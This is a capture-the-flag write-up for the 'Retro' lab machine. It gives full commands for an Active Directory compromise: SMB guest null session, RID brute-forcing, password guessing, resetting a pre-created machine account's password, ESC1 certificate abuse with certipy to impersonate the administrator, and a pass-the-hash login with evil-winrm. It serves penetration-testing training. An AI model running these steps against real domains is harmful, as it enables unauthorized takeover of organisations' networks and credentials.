# Retro - Writeup (VulnLab & HackTheBox)

```bash
██████╗░███████╗████████╗██████╗░░█████╗░
██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
██████╔╝█████╗░░░░░██║░░░██████╔╝██║░░██║
██╔══██╗██╔══╝░░░░░██║░░░██╔══██╗██║░░██║
██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝
╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░

-----------------------------------------
Easy box with SMB null session for initial foothold, 
RID bruteforce to get hints of a machine account, 
password reset, and ESC1 abuse through ADCS to escalate to Domain Admin.
```

# **❄️ NMAP & INFO**

```bash
53     → domain (Simple DNS Plus)  
88     → kerberos-sec (Microsoft Windows Kerberos)  
135    → msrpc (Microsoft Windows RPC)  
139    → netbios-ssn (Microsoft Windows netbios-ssn)  
389    → ldap (Microsoft Windows Active Directory LDAP)  
445    → microsoft-ds?  
464    → kpasswd5?  
593    → ncacn_http (Microsoft Windows RPC over HTTP 1.0)  
636    → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3268   → ldap (Microsoft Windows Active Directory LDAP)  
3269   → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3389   → ms-wbt-server (Microsoft Terminal Services)  
```

# **❄️ FOOTHOLD**

Since we don’t have any credentials yet, I started by bruteforcing Kerberos usernames using **kerbrute**, which revealed two valid accounts:

* `guest@retro.vl`
    
* `administrator@retro.vl`
    

An attempt at an RPC null session didn’t give me anything useful. So instead, I tried an SMB null session, this time assuming the `guest` account might allow anonymous access.

That folder Trainees looks interesting, we got Read permissions:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754028857503/a5347765-c59f-418d-9602-95c09c1d231f.png align="center")

## **SMB | Null Session**

Using [**smbclient.py**](http://smbclient.py):

```bash
smbclient.py DC.retro.vl/guest:''@10.129.172.145
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754028878406/89c25b7a-04c9-4c3c-8b71-05baee823451.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754028881420/ca462c56-09d2-4969-b0ae-2a9ddae603c0.png align="center")

After reading that note in the smb share, I tried to enumerate system accounts using RID bruteforcing with netexec:

```bash
nxc smb 10.129.172.145 -u guest -p '' --rid-brute
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029021751/1aead939-8ed6-4cdb-a7a5-6bdca98ac6a9.png align="center")

I built a list of possible usernames and ran a brute-force attack, which gave me valid credentials/access..

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029028293/bf21510e-fe28-4cdc-ac8f-9117cb2fca98.png align="center")

## **SMB | Trainee | flag.txt**

If I enumerate again using the newly obtained credentials, we get access to a new shared resource called **Notes**, where we have read permissions. If we connect via SMB, we’ll find two files:

* `user.txt` (our flag.txt)
    
* `ToDo.txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029059769/05414190-8559-40ab-ad3b-17634c266e13.png align="center")
    
    ## **Bloodhound Time**
    
    After reading the **ToDo.txt** file, I run an enumeration with **bloodhound-python** to visualize all possible objects in the AD:
    

```bash
bloodhound-python -u 'trainee' -p '<REDACTED>' -ns 10.129.172.145 -d 'retro.vl' -c all --dns-tcp --zip
```

Based on the hint mentioning an old pre-created machine account, I found a computer object named `BANKING.RETRO.VL`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029086058/0c542cf9-b97e-4188-99fc-d91d19799e98.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029089886/1d2d8aa1-898e-4ff4-8f9f-a31b213b3d1a.png align="center")

Knowing that machine accounts often use a default format like `Banking$`, I started testing a few common passwords with brute-force:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029103582/5d91702a-74e1-4aa7-898d-36228e9a069e.png align="center")

After reading [that post](https://medium.com/@offsecdeer/finding-weak-ad-computer-passwords-e3dc1ed220df), the `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT` error means the machine account password was reset or set to a default (like its lowercase name) after being pre-created or reset in AD, so it’s out of sync and no longer trusted by the domain!

By running:

```bash
changepasswd.py retro.vl/'BANKING$':banking@10.129.172.145 -newpass '<REDACTED>' -dc-ip 10.129.172.145 -p rpc-samr
```

I was able to change the machine account password successfully. Impacket’s [`changepasswd.py`](http://changepasswd.py) script lets you change a user’s password using LDAP, kpasswd, SMB, or RPC. Both SMB and RPC use the SAMR protocol, but since we can’t access the `IPC$` share with the default password (as already seen), we go with `rpc-samr`, which doesn’t require SMB session setup.

## **ADCS | PrivEsc**

After reviewing **BloodHound** again and changing the password for `BANKING$`, I enumerate with netexec to check for **ADCS** and see if we can abuse any templates.

The result confirms there’s a **PKI Enrollment Server** at `DC.retro.vl`, and the Certificate Authority is `retro-DC-CA`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029130732/90e0bbd7-c899-4e75-a43e-ab8aee3d2dde.png align="center")

## **ADCS | Finding Vulnerable Certificates**

By running:

```bash
certipy find -vulnerable -u BANKING$@DC.retro.vl -p "<REDACTED>" -target 10.129.172.145 -dc-ip 10.129.172.145 -stdout
```

## **ESC1 Abuse**

Now we can abuse ESC1 using certipy like this:

```bash
certipy req -u 'BANKING$'@retro.vl -p '<REDACTED>' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.129.172.145 -target-ip 10.129.172.145 -key-size 4096
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029155816/79896334-a146-4bfa-b83d-4ddc7769e852.png align="center")

Then I extract the hash like this and log in as `administrator` via **evil-winrm**:

```bash
evil-winrm -i 10.129.172.145 -u Administrator -H '<HASH>'

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
```

> **Pwned!**
